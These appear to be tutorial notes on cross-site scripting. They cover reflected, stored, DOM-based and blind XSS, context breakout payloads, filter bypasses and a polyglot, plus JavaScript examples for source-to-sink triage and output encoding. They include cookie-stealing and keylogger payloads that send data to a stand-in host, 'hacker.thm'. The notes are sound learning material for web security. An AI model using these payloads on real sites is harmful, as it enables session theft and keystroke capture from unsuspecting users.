Intro to Cross-site Scripting
May 18, 2025
Definition
XSS (cross-site scripting) is an injection vulnerability in which attacker-controlled input ends up interpreted as JavaScript by a victim's browser, running in the origin of the vulnerable site (so with that site's cookies, local storage and DOM), not on the attacker's machine.
Here are some example payloads for different scenarios.
Payloads
Here a payload consists of two parts: the intention (what the JavaScript should do once it runs) and the modification (the changes needed to make it execute in the exact place it is injected, for example closing a tag or a quoted string first).
POC
<script>alert('XSS');</script>
Session stealing
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Note that document.cookie only exposes cookies that were set without the HttpOnly flag; a session cookie with HttpOnly cannot be read this way, although the script can still act as the user from inside the page.
Keylogger
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
Reflected XSS
Reflected XSS happens when user-supplied data in an HTTP request is included in the response without any validation or output encoding, so the payload lives in the request (typically a link the victim is tricked into opening) rather than on the server.
Where to search for
- URL parameters
- URL file path
- Sometimes HTTP headers (although unlikely exploitable in practice, because an attacker cannot normally make a victim's browser send a crafted header)
Stored XSS
As the name implies, the XSS payload is stored on the web application (in a database, for example) and then runs when other users visit the site or web page, with no further interaction needed from the attacker.
Where to search for
- comment sections
- User profile information
- Website Listings
DOM Based XSS
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website's own JavaScript takes attacker-controllable input (a source such as location.hash or document.referrer) and passes it to a sink that parses HTML or evaluates code (innerHTML, document.write, eval). A payload carried in the URL fragment (#...) is never sent to the server, so server-side filters and logs do not see it.
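As an added example (not from the original notes), the source-to-sink triage a tester does on client-side JavaScript before trying a DOM payload: grep for attacker-controlled sources and HTML/code sinks, and flag scripts that use both. The two sample scripts and the source/sink lists are constructed for this example; a hit is a lead to verify in the browser, not proof of exploitability.

```javascript
// Added example: source-to-sink triage for DOM-based XSS.
// Sample scripts and lists below are constructed for this example.

// Attacker-controllable inputs that need no server round-trip.
const DOM_SOURCES = [
  'location.hash', 'location.search', 'location.href',
  'document.URL', 'document.referrer', 'window.name',
];

// Sinks that parse their argument as HTML or evaluate it as code.
const DOM_SINKS = [
  'innerHTML', 'outerHTML', 'insertAdjacentHTML',
  'document.write', 'document.writeln', 'eval(', 'Function(',
];

// Returns { sources, sinks, suspicious } for one script. "suspicious" means a
// source and a sink both appear; a sanitizer between them is not detected here.
function triageScript(src) {
  const sources = [];
  const sinks = [];
  src.split('\n').forEach((line, i) => {
    for (const s of DOM_SOURCES) {
      if (line.includes(s)) sources.push({ line: i + 1, source: s });
    }
    for (const k of DOM_SINKS) {
      if (line.includes(k)) sinks.push({ line: i + 1, sink: k });
    }
  });
  return { sources, sinks, suspicious: sources.length > 0 && sinks.length > 0 };
}

// Constructed sample 1: the URL fragment is written straight into innerHTML.
const VULNERABLE_SCRIPT = `
const name = decodeURIComponent(location.hash.slice(1));
document.getElementById('greeting').innerHTML = 'Welcome, ' + name;
`;

// Constructed sample 2: same source, but textContent never parses HTML.
const SAFE_SCRIPT = `
const name = decodeURIComponent(location.hash.slice(1));
document.getElementById('greeting').textContent = 'Welcome, ' + name;
`;

// Fragment to append to the vulnerable page's URL. A <script> element inserted
// through innerHTML does not execute, so an event-handler payload is used instead.
const DOM_PAYLOAD_FRAGMENT = "#<img src=x onerror=alert('THM')>";

for (const [label, script] of [['vulnerable', VULNERABLE_SCRIPT], ['safe', SAFE_SCRIPT]]) {
  console.log(label, JSON.stringify(triageScript(script)));
}
console.log('try:', 'https://target.example/page' + DOM_PAYLOAD_FRAGMENT);
```

Run it with node; the vulnerable sample reports location.hash on line 2 flowing toward innerHTML on line 3, while the textContent version has a source but no sink. In a real review the same lists are fed to grep over the site's bundled JavaScript.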
Blind XSS
Blind XSS is similar to stored XSS (above) in that your payload gets stored on the website for another user to view (a support ticket, a contact form, a log viewer), but in this instance you can't see the payload working or test it against yourself first. The payload therefore has to call back to a server you control, like the session-stealing payload above, and you confirm execution by watching that listener.
Perfecting payloads
Each payload below is the modification part: it is shaped for the HTML context the input lands in, or for the filter the application applies.
Bypassing an input field (value lands inside a quoted attribute, so close the quote and the tag first)
"><script>alert('THM');</script>
Bypassing a text area (value lands between <textarea> tags, so close the element first)
</textarea><script>alert('THM');</script>
Bypassing a script (value lands inside a string literal in existing JavaScript, so close the string and comment out the rest)
';alert('THM');//
Bypassing filtration of the word "script" (the filter removes the word once, and what is left reads "script")
<sscriptcript>alert('THM');</sscriptcript>
Bypassing filtration of the characters "< >" (value lands inside an attribute such as an image src, so a new attribute is added instead of a new tag)
/images/cat.jpg" onload="alert('THM');
Polyglot (a single string that breaks out of several contexts at once, useful when the context is unknown)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
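As an added example (not from the original notes), the breakout payloads above rendered into the template context each one targets, next to the naive filter each one defeats and the encoder that actually closes the hole. The templates, the two naive filters and the two encoders are constructed for this example; the payload strings are the ones listed above.

```javascript
// Added example: why each breakout payload works, and the context-correct fix.
// Templates and filters below are constructed for this example.

const THM = {
  inputField: `"><script>alert('THM');</script>`,
  textarea:   `</textarea><script>alert('THM');</script>`,
  scriptStr:  `';alert('THM');//`,
  wordFilter: `<sscriptcript>alert('THM');</sscriptcript>`,
  noAngles:   `/images/cat.jpg" onload="alert('THM');`,
};

// HTML entity encoding: the fix for HTML body and quoted-attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// JS string-literal encoding: the fix for a value inside an inline <script>.
// JSON.stringify escapes quotes and backslashes; '<' is escaped too so the
// value can never contain a literal "</script>" that would end the block.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c');
}

// The naive filters the last two payloads are built to get past.
const stripScriptOnce = (s) => s.replace(/script/gi, '');
const stripAngles = (s) => s.replace(/[<>]/g, '');

// Vulnerable templates (raw interpolation) beside their fixed versions.
const renderInput = (v) => `<input type="text" value="${v}">`;
const renderInputSafe = (v) => `<input type="text" value="${escapeHtml(v)}">`;
const renderTextarea = (v) => `<textarea>${v}</textarea>`;
const renderTextareaSafe = (v) => `<textarea>${escapeHtml(v)}</textarea>`;
const renderScriptVar = (v) => `<script>var name = '${v}';</script>`;
const renderScriptVarSafe = (v) => `<script>var name = ${jsStringLiteral(v)};</script>`;
const renderImg = (src) => `<img src="${src}">`;
const renderImgSafe = (src) => `<img src="${escapeHtml(src)}">`;

// Each entry is [vulnerable output, fixed output] for the matching payload.
function demo() {
  return {
    inputField: [renderInput(THM.inputField), renderInputSafe(THM.inputField)],
    textarea:   [renderTextarea(THM.textarea), renderTextareaSafe(THM.textarea)],
    scriptStr:  [renderScriptVar(THM.scriptStr), renderScriptVarSafe(THM.scriptStr)],
    // one pass of the word filter leaves a clean <script> tag behind; encoding
    // the output makes the word harmless instead of trying to delete it
    wordFilter: [stripScriptOnce(THM.wordFilter), escapeHtml(THM.wordFilter)],
    // the payload has no '<' or '>', so the angle-bracket filter passes it
    // untouched and a new onload attribute still appears on the <img>
    noAngles:   [renderImg(stripAngles(THM.noAngles)), renderImgSafe(THM.noAngles)],
  };
}

for (const [ctx, [bad, good]] of Object.entries(demo())) {
  console.log(`${ctx}\n  vulnerable: ${bad}\n  fixed:      ${good}`);
}
```

Two things worth noticing in the output: the fixed image tag still contains the text "onload=", but it sits inside the src value because the quote that would have closed that value is now &quot;; and the script-string case cannot be fixed with HTML entity encoding, because the browser does not decode entities inside a <script> block, which is why a JavaScript string encoder is used there instead.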